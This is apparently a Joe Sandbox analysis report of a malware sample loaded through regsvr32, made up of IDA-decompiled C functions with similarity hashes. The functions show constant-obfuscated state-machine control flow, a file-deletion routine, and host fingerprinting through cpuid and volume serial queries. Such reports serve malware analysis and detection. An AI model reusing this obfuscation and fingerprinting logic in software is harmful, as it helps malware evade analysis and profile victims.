                                                                                                                				_v116 = _v116 + 0xd60d;
                                                                                                                				_v116 = _v116 >> 9;
                                                                                                                				_v116 = _v116 + 0xbbc1;
                                                                                                                				_v116 = _v116 ^ 0x00055f92;
                                                                                                                				_v88 = 0xd7caf3;
                                                                                                                				_t279 = 0x35;
                                                                                                                				_v88 = _v88 / _t279;
                                                                                                                				_v88 = _v88 ^ 0xc4b56b1e;
                                                                                                                				_v88 = _v88 ^ 0xc4b0f62e;
                                                                                                                				_v120 = 0x7b4ef4;
                                                                                                                				_v120 = _v120 ^ 0x89e38ecd;
                                                                                                                				_t280 = 0x31;
                                                                                                                				_v120 = _v120 * 0xd;
                                                                                                                				_v120 = _v120 >> 0xb;
                                                                                                                				_v120 = _v120 ^ 0x0010d987;
                                                                                                                				_v40 = 0xb7a21e;
                                                                                                                				_v40 = _v40 | 0xefe266cc;
                                                                                                                				_v40 = _v40 ^ 0xeff0c30f;
                                                                                                                				_v104 = 0x7cf6b1;
                                                                                                                				_v104 = _v104 << 1;
                                                                                                                				_v104 = _v104 * 0x75;
                                                                                                                				_v104 = _v104 ^ 0x9612fbaa;
                                                                                                                				_v104 = _v104 ^ 0xe421d094;
                                                                                                                				_v108 = 0xc91341;
                                                                                                                				_v108 = _v108 / _t280;
                                                                                                                				_v108 = _v108 ^ 0xd16fd725;
                                                                                                                				_v108 = _v108 + 0x8f6d;
                                                                                                                				_v108 = _v108 ^ 0xd16e859c;
                                                                                                                				_v32 = 0x64a429;
                                                                                                                				_v32 = _v32 >> 2;
                                                                                                                				_v32 = _v32 ^ 0x001a5b9d;
                                                                                                                				_v72 = 0x904539;
                                                                                                                				_v72 = _v72 + 0xffff5170;
                                                                                                                				_v72 = _v72 * 0x53;
                                                                                                                				_v72 = _v72 ^ 0x2e8295ef;
                                                                                                                				_v36 = 0x815f8a;
                                                                                                                				_v36 = _v36 + 0xae82;
                                                                                                                				_v36 = _v36 ^ 0x0089e518;
                                                                                                                				_v76 = 0x35102d;
                                                                                                                				_v76 = _v76 << 3;
                                                                                                                				_v76 = _v76 + 0xdd23;
                                                                                                                				_v76 = _v76 ^ 0x01aa4224;
                                                                                                                				_v80 = 0x7c57ea;
                                                                                                                				_t281 = 0x30;
                                                                                                                				_v80 = _v80 / _t281;
                                                                                                                				_v80 = _v80 << 0x10;
                                                                                                                				_v80 = _v80 ^ 0x9725f848;
                                                                                                                				_v84 = 0x28968b;
                                                                                                                				_t282 = 0x15;
                                                                                                                				_t274 = _v16;
                                                                                                                				_v84 = _v84 * 0x62;
                                                                                                                				_v84 = _v84 / _t282;
                                                                                                                				_v84 = _v84 ^ 0x00bee896;
                                                                                                                				_v56 = 0x5ac5c0;
                                                                                                                				_v56 = _v56 >> 9;
                                                                                                                				_v56 = _v56 | 0xd393b6e5;
                                                                                                                				_v56 = _v56 ^ 0xd39d981b;
                                                                                                                				_v60 = 0x48f323;
                                                                                                                				_t283 = 0x59;
                                                                                                                				_v60 = _v60 / _t283;
                                                                                                                				_v60 = _v60 ^ 0xf9ba1679;
                                                                                                                				_v60 = _v60 ^ 0xf9bb0444;
                                                                                                                				_v100 = 0x70da32;
                                                                                                                				_v100 = _v100 | 0x181a6af5;
                                                                                                                				_v100 = _v100 << 3;
                                                                                                                				_v100 = _v100 >> 3;
                                                                                                                				_v100 = _v100 ^ 0x187445c1;
                                                                                                                				_v64 = 0x4cfa42;
                                                                                                                				_t284 = 0x1b;
                                                                                                                				_v64 = _v64 / _t284;
                                                                                                                				_v64 = _v64 << 1;
                                                                                                                				_v64 = _v64 ^ 0x0003d254;
                                                                                                                				_v92 = 0x2ab664;
                                                                                                                				_v92 = _v92 ^ 0xbdfb9acc;
                                                                                                                				_v92 = _v92 + 0x75a9;
                                                                                                                				_v92 = _v92 ^ 0xbdda7332;
                                                                                                                				_v44 = 0x3efb10;
                                                                                                                				_v44 = _v44 << 1;
                                                                                                                				_v44 = _v44 ^ 0x0073a534;
                                                                                                                				_v96 = 0xb8a4ae;
                                                                                                                				_v96 = _v96 << 9;
                                                                                                                				_v96 = _v96 << 3;
                                                                                                                				_v96 = _v96 ^ 0x8a4cd5df;
                                                                                                                				_v48 = 0x7b415c;
                                                                                                                				_v48 = _v48 * 0x1e;
                                                                                                                				_v48 = _v48 ^ 0x0e7e0d60;
                                                                                                                				_v24 = 0x277d20;
                                                                                                                				_v24 = _v24 << 7;
                                                                                                                				_v24 = _v24 ^ 0x13b39931;
                                                                                                                				_v52 = 0xc6e76b;
                                                                                                                				_v52 = _v52 + 0x3657;
                                                                                                                				_v52 = _v52 + 0xffff019d;
                                                                                                                				_v52 = _v52 ^ 0x00cfa770;
                                                                                                                				_v28 = 0xe2c7ba;
                                                                                                                				_v28 = _v28 + 0x82a;
                                                                                                                				_v28 = _v28 ^ 0x00eb1868;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t285 = 0x5c;
                                                                                                                					while(1) {
                                                                                                                						_t265 = 0xb32f6ce;
                                                                                                                						do {
                                                                                                                							L3:
                                                                                                                							while(_t315 != 0x2381b6f) {
                                                                                                                								if(_t315 == 0x5f1f776) {
                                                                                                                									_t275 =  *0x1c4c10; // 0x67d820
                                                                                                                									_t276 = _t275 + 0x20c;
                                                                                                                									while(1) {
                                                                                                                										__eflags =  *_t276 - _t285;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t276 = _t276 + 2;
                                                                                                                										__eflags = _t276;
                                                                                                                									}
                                                                                                                									_t274 = _t276 + 2;
                                                                                                                									_t315 = 0x2381b6f;
                                                                                                                									_t265 = 0xb32f6ce;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t315 == 0x7314998) {
                                                                                                                										E001B3CBE(_v24, _v20, _v52, _v28);
                                                                                                                									} else {
                                                                                                                										if(_t315 == 0x8b00593) {
                                                                                                                											_t315 = 0x5f1f776;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											if(_t315 != _t265) {
                                                                                                                												goto L15;
                                                                                                                											} else {
                                                                                                                												_t273 = E001A6C71(_t274, _v92, _v44, _v96, _v48, _v20);
                                                                                                                												_t319 =  &(_t319[4]);
                                                                                                                												_t315 = 0x7314998;
                                                                                                                												_v16 = 0 | _t273 == 0x00000000;
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L18:
                                                                                                                								return _v16;
                                                                                                                							}
                                                                                                                							_push(_v40);
                                                                                                                							_push(0x1a110c);
                                                                                                                							_push(_v120);
                                                                                                                							_t286 = _v116;
                                                                                                                							__eflags = E001A3E99(_v116, _v68, _v104, _v116, E001BF5D9(_v116, _v88, __eflags), _t286, _v108, _v32,  &_v20, _v72, _t286, _v112, _v36, _v76, _t286, _v80, _v84);
                                                                                                                							_t315 =  ==  ? 0xb32f6ce : 0x88b21bc;
                                                                                                                							E001BF94B(_t266, _v56, _v60, _v100, _v64);
                                                                                                                							_t319 =  &(_t319[0x15]);
                                                                                                                							_t265 = 0xb32f6ce;
                                                                                                                							_t285 = 0x5c;
                                                                                                                							L15:
                                                                                                                							__eflags = _t315 - 0x88b21bc;
                                                                                                                						} while (__eflags != 0);
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x001ac761
                                                                                                                0x001ac769
                                                                                                                0x001ac775
                                                                                                                0x001ac778
                                                                                                                0x001ac77c
                                                                                                                0x001ac780
                                                                                                                0x001ac788
                                                                                                                0x001ac790
                                                                                                                0x001ac798
                                                                                                                0x001ac7a0
                                                                                                                0x001ac7a8
                                                                                                                0x001ac7b0
                                                                                                                0x001ac7b4
                                                                                                                0x001ac7bc
                                                                                                                0x001ac7c4
                                                                                                                0x001ac7c9
                                                                                                                0x001ac7ce
                                                                                                                0x001ac7d6
                                                                                                                0x001ac7e3
                                                                                                                0x001ac7e7
                                                                                                                0x001ac7ef
                                                                                                                0x001ac7f7
                                                                                                                0x001ac7fc
                                                                                                                0x001ac804
                                                                                                                0x001ac80c
                                                                                                                0x001ac814
                                                                                                                0x001ac81c
                                                                                                                0x001ac824
                                                                                                                0x001ac82c
                                                                                                                0x001ac834
                                                                                                                0x001ac83c
                                                                                                                0x001ac83c
                                                                                                                0x001ac83e
                                                                                                                0x001ac83f
                                                                                                                0x001ac83f
                                                                                                                0x001ac844
                                                                                                                0x00000000
                                                                                                                0x001ac844
                                                                                                                0x001ac84e
                                                                                                                0x001ac8a3
                                                                                                                0x001ac8a9
                                                                                                                0x001ac8b4
                                                                                                                0x001ac8b4
                                                                                                                0x001ac8b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b9
                                                                                                                0x001ac8bc
                                                                                                                0x001ac83f
                                                                                                                0x00000000
                                                                                                                0x001ac850
                                                                                                                0x001ac856
                                                                                                                0x001ac977
                                                                                                                0x001ac85c
                                                                                                                0x001ac862
                                                                                                                0x001ac89c
                                                                                                                0x00000000
                                                                                                                0x001ac864
                                                                                                                0x001ac866
                                                                                                                0x00000000
                                                                                                                0x001ac86c
                                                                                                                0x001ac882
                                                                                                                0x001ac889
                                                                                                                0x001ac88e
                                                                                                                0x001ac896
                                                                                                                0x00000000
                                                                                                                0x001ac896
                                                                                                                0x001ac866
                                                                                                                0x001ac862
                                                                                                                0x001ac856
                                                                                                                0x001ac97e
                                                                                                                0x001ac989
                                                                                                                0x001ac989
                                                                                                                0x001ac8c3
                                                                                                                0x001ac8c7
                                                                                                                0x001ac8cc
                                                                                                                0x001ac8d4
                                                                                                                0x001ac926
                                                                                                                0x001ac946
                                                                                                                0x001ac949
                                                                                                                0x001ac94e
                                                                                                                0x001ac951
                                                                                                                0x001ac958
                                                                                                                0x001ac959
                                                                                                                0x001ac959
                                                                                                                0x001ac959
                                                                                                                0x00000000
                                                                                                                0x001ac965
                                                                                                                0x001ac83f

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: }'$W6$\A{$}u$W|
                                                                                                                • API String ID: 0-1907099679
                                                                                                                • Opcode ID: e5a57107a2f09d8e72456048437c800bbadfe2dcb2d96cfd57b9f654c9a0caa0
                                                                                                                • Instruction ID: 89a9a2e4878dfb8e00d224e99bbb5c1b5b9b90aad3b24881d3fca34f262c325d
                                                                                                                • Opcode Fuzzy Hash: e5a57107a2f09d8e72456048437c800bbadfe2dcb2d96cfd57b9f654c9a0caa0
                                                                                                                • Instruction Fuzzy Hash: 7AC11EB66083809FD358CF65C88A50BFBF2FBD5798F20891DF1A586260D7B58949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B6998(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				intOrPtr _v96;
                                                                                                                				intOrPtr _v100;
                                                                                                                				intOrPtr _v104;
                                                                                                                				char _v624;
                                                                                                                				void* _t205;
                                                                                                                				signed int _t214;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t216;
                                                                                                                				signed int _t217;
                                                                                                                				intOrPtr _t218;
                                                                                                                
                                                                                                                				_v92 = _v92 & 0x00000000;
                                                                                                                				_v104 = 0x40c67f;
                                                                                                                				_v100 = 0x3e54db;
                                                                                                                				_v96 = 0xb32203;
                                                                                                                				_v20 = 0x574ba2;
                                                                                                                				_v20 = _v20 | 0x35973b8a;
                                                                                                                				_v20 = _v20 + 0xffff32d7;
                                                                                                                				_v20 = _v20 >> 6;
                                                                                                                				_v20 = _v20 ^ 0x00d1d2c7;
                                                                                                                				_v44 = 0xa28c;
                                                                                                                				_v44 = _v44 + 0xffffc1d2;
                                                                                                                				_v44 = _v44 + 0xffff5d52;
                                                                                                                				_v44 = _v44 ^ 0xfff742c8;
                                                                                                                				_v12 = 0x374331;
                                                                                                                				_v12 = _v12 + 0x3a39;
                                                                                                                				_v12 = _v12 | 0xe682e43f;
                                                                                                                				_v12 = _v12 + 0x9525;
                                                                                                                				_v12 = _v12 ^ 0xe6b0dfa1;
                                                                                                                				_v16 = 0x7dac65;
                                                                                                                				_t214 = 0x1c;
                                                                                                                				_v16 = _v16 * 0x56;
                                                                                                                				_v16 = _v16 + 0xb3ad;
                                                                                                                				_v16 = _v16 + 0xffff8d20;
                                                                                                                				_v16 = _v16 ^ 0x2a31d0e2;
                                                                                                                				_v84 = 0x674ce;
                                                                                                                				_v84 = _v84 >> 6;
                                                                                                                				_v84 = _v84 ^ 0x00002de4;
                                                                                                                				_v64 = 0xaa2744;
                                                                                                                				_v64 = _v64 + 0xffff19cf;
                                                                                                                				_v64 = _v64 ^ 0x00a461c3;
                                                                                                                				_v8 = 0x53ad32;
                                                                                                                				_v8 = _v8 | 0x03ce696d;
                                                                                                                				_v8 = _v8 >> 5;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x00074f88;
                                                                                                                				_v56 = 0x7df6e2;
                                                                                                                				_v56 = _v56 | 0x123fa6ce;
                                                                                                                				_v56 = _v56 * 0x49;
                                                                                                                				_v56 = _v56 ^ 0x467b80f8;
                                                                                                                				_v40 = 0x561f3f;
                                                                                                                				_v40 = _v40 + 0xffff951d;
                                                                                                                				_v40 = _v40 >> 2;
                                                                                                                				_v40 = _v40 ^ 0x001dff13;
                                                                                                                				_v48 = 0x2a3047;
                                                                                                                				_v48 = _v48 | 0xfb435b17;
                                                                                                                				_v48 = _v48 * 0x31;
                                                                                                                				_v48 = _v48 ^ 0x1f9d5b70;
                                                                                                                				_v76 = 0x748ff2;
                                                                                                                				_v76 = _v76 + 0xffff5c97;
                                                                                                                				_v76 = _v76 ^ 0x00728883;
                                                                                                                				_v28 = 0xa7acb4;
                                                                                                                				_v28 = _v28 / _t214;
                                                                                                                				_t215 = 0x15;
                                                                                                                				_v28 = _v28 * 0x5e;
                                                                                                                				_v28 = _v28 ^ 0x023c0c02;
                                                                                                                				_v36 = 0xffef9e;
                                                                                                                				_v36 = _v36 | 0x7279e6a3;
                                                                                                                				_v36 = _v36 + 0xc817;
                                                                                                                				_v36 = _v36 ^ 0x7307f371;
                                                                                                                				_v88 = 0x7428a9;
                                                                                                                				_v88 = _v88 + 0xffffe6d9;
                                                                                                                				_v88 = _v88 ^ 0x007f0dce;
                                                                                                                				_v32 = 0xbaf18f;
                                                                                                                				_v32 = _v32 | 0xa06f54ab;
                                                                                                                				_v32 = _v32 / _t215;
                                                                                                                				_v32 = _v32 ^ 0x07a74daf;
                                                                                                                				_v72 = 0x47564;
                                                                                                                				_v72 = _v72 << 1;
                                                                                                                				_v72 = _v72 ^ 0x00035d2c;
                                                                                                                				_v52 = 0xe20680;
                                                                                                                				_v52 = _v52 >> 0xb;
                                                                                                                				_t216 = 0x51;
                                                                                                                				_v52 = _v52 / _t216;
                                                                                                                				_v52 = _v52 ^ 0x00050690;
                                                                                                                				_v68 = 0x56feb1;
                                                                                                                				_v68 = _v68 | 0x9e3441a5;
                                                                                                                				_v68 = _v68 ^ 0x9e7f1965;
                                                                                                                				_v24 = 0x4edc60;
                                                                                                                				_v24 = _v24 + 0xffffe4ed;
                                                                                                                				_t217 = 0x27;
                                                                                                                				_v24 = _v24 / _t217;
                                                                                                                				_v24 = _v24 << 4;
                                                                                                                				_v24 = _v24 ^ 0x00274fe8;
                                                                                                                				_v80 = 0xfb4675;
                                                                                                                				_v80 = _v80 ^ 0x928383bd;
                                                                                                                				_v80 = _v80 ^ 0x9272faf3;
                                                                                                                				_v60 = 0x9867a3;
                                                                                                                				_v60 = _v60 ^ 0x26fbf63a;
                                                                                                                				_v60 = _v60 | 0xbd6007a6;
                                                                                                                				_v60 = _v60 ^ 0xbf6c0bf9;
                                                                                                                				_t218 =  *0x1c4c10; // 0x67d820
                                                                                                                				_t168 = _t218 + 0x20c; // 0x75004c
                                                                                                                				_t205 = E001ABEE4(_v16, _v84, E001A2263(_t168, _v20, _v44, _v12), _v64, _a4 + 0x2c, _v8);
                                                                                                                				_t250 = _t205;
                                                                                                                				if(_t205 != 0) {
                                                                                                                					_push(_v76);
                                                                                                                					_push(0x1a109c);
                                                                                                                					_push(_v48);
                                                                                                                					E001B8EB3( *((intOrPtr*)(_a8 + 0x10)), _t250, _v28, _v56, _v36,  &_v624, _v88, E001BF5D9(_v56, _v40, _t250), _v32);
                                                                                                                					E001BF94B(_t208, _v72, _v52, _v68, _v24);
                                                                                                                					E001A7BC6(_v80, _v60,  &_v624);
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}




































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: 1C7$9:$G0*$-$O'
                                                                                                                • API String ID: 4033686569-3620061630
                                                                                                                • Opcode ID: 472a0d76273302b368393f347fe82f24a42877942ca78ba4d53cf60ccd3f897b
                                                                                                                • Instruction ID: b7b7d74f709e53fcc0908d13359b3c65175ce04987298b803b3bd0ffa9bec5f9
                                                                                                                • Opcode Fuzzy Hash: 472a0d76273302b368393f347fe82f24a42877942ca78ba4d53cf60ccd3f897b
                                                                                                                • Instruction Fuzzy Hash: B091EF71D0130DEBCF58CFE5D98A8DEBBB2BB44318F208159E411BA260D7B50A5ACF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1001A057(void* __ecx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t5;
                                                                                                                				void* _t15;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				if((E1001D23C(__ecx) & 0x40000000) != 0) {
                                                                                                                					L6:
                                                                                                                					_t5 = E10019B72(_t15, _t15, _t18, __eflags);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  ~( ~_t5);
                                                                                                                				}
                                                                                                                				_t19 = E10004700();
                                                                                                                				if(_t19 == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_t18 = GetKeyState;
                                                                                                                				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}










                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • GetKeyState.USER32(00000010), ref: 1001A07B
                                                                                                                • GetKeyState.USER32(00000011), ref: 1001A084
                                                                                                                • GetKeyState.USER32(00000012), ref: 1001A08D
                                                                                                                • SendMessageA.USER32 ref: 1001A0A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: 9b59dec9598ab01ff2adb46d1952c09e509c8ceae496ba36d9fab1bdc3203c98
                                                                                                                • Instruction ID: 52e411cb2b8fe51767d99304a7365cfce5836da778a9601f26abfa61a435c152
                                                                                                                • Opcode Fuzzy Hash: 9b59dec9598ab01ff2adb46d1952c09e509c8ceae496ba36d9fab1bdc3203c98
                                                                                                                • Instruction Fuzzy Hash: D6F0E9BA3C03AA26E621B2745C41F992195CF4ABD0F020534E642EF0D6C9F1CCC11270
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10012490(void* __edx, intOrPtr __esi, void* __ebp, signed int _a4) {
                                                                                                                				DWORD* _v4;
                                                                                                                				char _v8;
                                                                                                                				char _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v20;
                                                                                                                				signed int _v24;
                                                                                                                				char _v32;
                                                                                                                				char _v148;
                                                                                                                				char _v276;
                                                                                                                				DWORD* _v280;
                                                                                                                				char _v284;
                                                                                                                				char _v288;
                                                                                                                				intOrPtr _v292;
                                                                                                                				char _v296;
                                                                                                                				char _v300;
                                                                                                                				char _v304;
                                                                                                                				intOrPtr _v308;
                                                                                                                				long _v312;
                                                                                                                				intOrPtr _v320;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t89;
                                                                                                                				signed int _t91;
                                                                                                                				intOrPtr* _t94;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				intOrPtr* _t102;
                                                                                                                				char _t105;
                                                                                                                				void* _t115;
                                                                                                                				intOrPtr* _t118;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				intOrPtr* _t126;
                                                                                                                				intOrPtr* _t133;
                                                                                                                				intOrPtr* _t134;
                                                                                                                				signed int** _t138;
                                                                                                                				signed int** _t140;
                                                                                                                				signed int** _t142;
                                                                                                                				signed int** _t144;
                                                                                                                				intOrPtr* _t146;
                                                                                                                				intOrPtr _t165;
                                                                                                                				char _t175;
                                                                                                                				signed int _t192;
                                                                                                                				signed int _t198;
                                                                                                                				intOrPtr _t219;
                                                                                                                				long _t222;
                                                                                                                				signed int _t226;
                                                                                                                				signed int _t234;
                                                                                                                				signed int _t236;
                                                                                                                				signed int _t238;
                                                                                                                				signed int _t240;
                                                                                                                				signed int _t246;
                                                                                                                				intOrPtr _t247;
                                                                                                                				intOrPtr _t248;
                                                                                                                				void* _t249;
                                                                                                                				void* _t250;
                                                                                                                				signed int _t251;
                                                                                                                				void* _t253;
                                                                                                                				signed int _t254;
                                                                                                                				intOrPtr* _t256;
                                                                                                                				intOrPtr* _t258;
                                                                                                                				intOrPtr* _t260;
                                                                                                                				intOrPtr* _t263;
                                                                                                                				intOrPtr* _t265;
                                                                                                                
                                                                                                                				_t249 = __ebp;
                                                                                                                				_t248 = __esi;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E100522DF);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t251 = _t250 - 0x12c;
                                                                                                                				_t89 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v16 = _t89 ^ _t251;
                                                                                                                				_t91 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t91 ^ _t251);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t246 = _a4;
                                                                                                                				_v4 = 0;
                                                                                                                				_v276 = _t246;
                                                                                                                				_v280 = 0;
                                                                                                                				_t94 = E100173A6();
                                                                                                                				_t256 = _t94;
                                                                                                                				_t167 = 0 | _t256 == 0x00000000;
                                                                                                                				if(_t256 == 0) {
                                                                                                                					_t94 = E10001000(_t167, __edx, 0x80004005);
                                                                                                                				}
                                                                                                                				_t217 =  *_t94;
                                                                                                                				_v284 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xc))))() + 0x10;
                                                                                                                				_v4 = 1;
                                                                                                                				_t98 = E100173A6();
                                                                                                                				_t258 = _t98;
                                                                                                                				_t170 = 0 | _t258 == 0x00000000;
                                                                                                                				if(_t258 == 0) {
                                                                                                                					_t98 = E10001000(_t170, _t217, 0x80004005);
                                                                                                                				}
                                                                                                                				_t218 =  *_t98;
                                                                                                                				_v296 =  *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() + 0x10;
                                                                                                                				_v4 = 2;
                                                                                                                				_t102 = E100173A6();
                                                                                                                				_t260 = _t102;
                                                                                                                				_t173 = 0 | _t260 == 0x00000000;
                                                                                                                				if(_t260 == 0) {
                                                                                                                					_t102 = E10001000(_t173, _t218, 0x80004005);
                                                                                                                				}
                                                                                                                				_t219 =  *_t102;
                                                                                                                				_t105 =  *((intOrPtr*)( *((intOrPtr*)(_t219 + 0xc))))() + 0x10;
                                                                                                                				_v288 = _t105;
                                                                                                                				_v4 = 3;
                                                                                                                				_push(_t105);
                                                                                                                				_push(_t219);
                                                                                                                				asm("cpuid");
                                                                                                                				_v312 = 0;
                                                                                                                				_v304 = 1;
                                                                                                                				_t175 = _v304;
                                                                                                                				_t222 = _v312;
                                                                                                                				_push(_t175);
                                                                                                                				_push(E10003500( &_v296, "%08X%08X", _t222));
                                                                                                                				_push(_t175);
                                                                                                                				_push(_t222);
                                                                                                                				asm("cpuid");
                                                                                                                				_v312 = 0;
                                                                                                                				_v304 = 0;
                                                                                                                				_push(_v304);
                                                                                                                				E10003500( &_v288, "%08X%08X", _v312);
                                                                                                                				_t226 =  &_v296;
                                                                                                                				_t115 = E100020B0(_t249,  &_v300, _t226,  &_v288);
                                                                                                                				_t253 = _t251 + 0x2c;
                                                                                                                				_push(_t115);
                                                                                                                				_v4 = 4;
                                                                                                                				E10001FF0( &_v284);
                                                                                                                				_t118 = _v304 + 0xfffffff0;
                                                                                                                				_v8 = 3;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				if((_t226 | 0xffffffff) - 1 <= 0) {
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t118)) + 4))))(_t118);
                                                                                                                				}
                                                                                                                				GetVolumeInformationA("c:\\",  &_v148, 0x80,  &_v312, 0, 0,  &_v276, 0x80);
                                                                                                                				_t121 = E100173A6();
                                                                                                                				_t263 = _t121;
                                                                                                                				_t184 = 0 | _t263 == 0x00000000;
                                                                                                                				if(_t263 == 0) {
                                                                                                                					_t121 = E10001000(_t184,  &_v312, 0x80004005);
                                                                                                                				}
                                                                                                                				_v304 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0xc))))() + 0x10;
                                                                                                                				_v8 = 5;
                                                                                                                				E10003500( &_v304, 0x10058714, _v312);
                                                                                                                				_t254 = _t253 + 0xc;
                                                                                                                				_t126 = E100173A6();
                                                                                                                				_t265 = _t126;
                                                                                                                				_t188 = 0 | _t265 == 0x00000000;
                                                                                                                				if(_t265 == 0) {
                                                                                                                					_t126 = E10001000(_t188,  &_v304, 0x80004005);
                                                                                                                				}
                                                                                                                				 *_t246 =  *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0xc))))() + 0x10;
                                                                                                                				_v284 = 1;
                                                                                                                				_push(E10012130( &_v296, 0xd, 5));
                                                                                                                				_t192 = _t246;
                                                                                                                				_v20 = 6;
                                                                                                                				E10001FF0(_t192);
                                                                                                                				_t133 = _v312 + 0xfffffff0;
                                                                                                                				_v24 = 5;
                                                                                                                				asm("lock xadd [edx], ecx");
                                                                                                                				if((_t192 | 0xffffffff) - 1 <= 0) {
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t133)) + 4))))(_t133);
                                                                                                                				}
                                                                                                                				_t134 = E10012130( &_v300, 3, 5);
                                                                                                                				_t198 = _t246;
                                                                                                                				_v24 = 7;
                                                                                                                				E10003480(5, _t198, _t246, _t248, _t249,  *_t134,  *((intOrPtr*)( *_t134 - 0xc)));
                                                                                                                				_t138 = _v320 + 0xfffffff0;
                                                                                                                				_v32 = 5;
                                                                                                                				_t234 =  &(_t138[3]);
                                                                                                                				asm("lock xadd [edx], ecx");
                                                                                                                				if((_t198 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t234 =  *( *_t138);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t234 + 4))))(_t138);
                                                                                                                				}
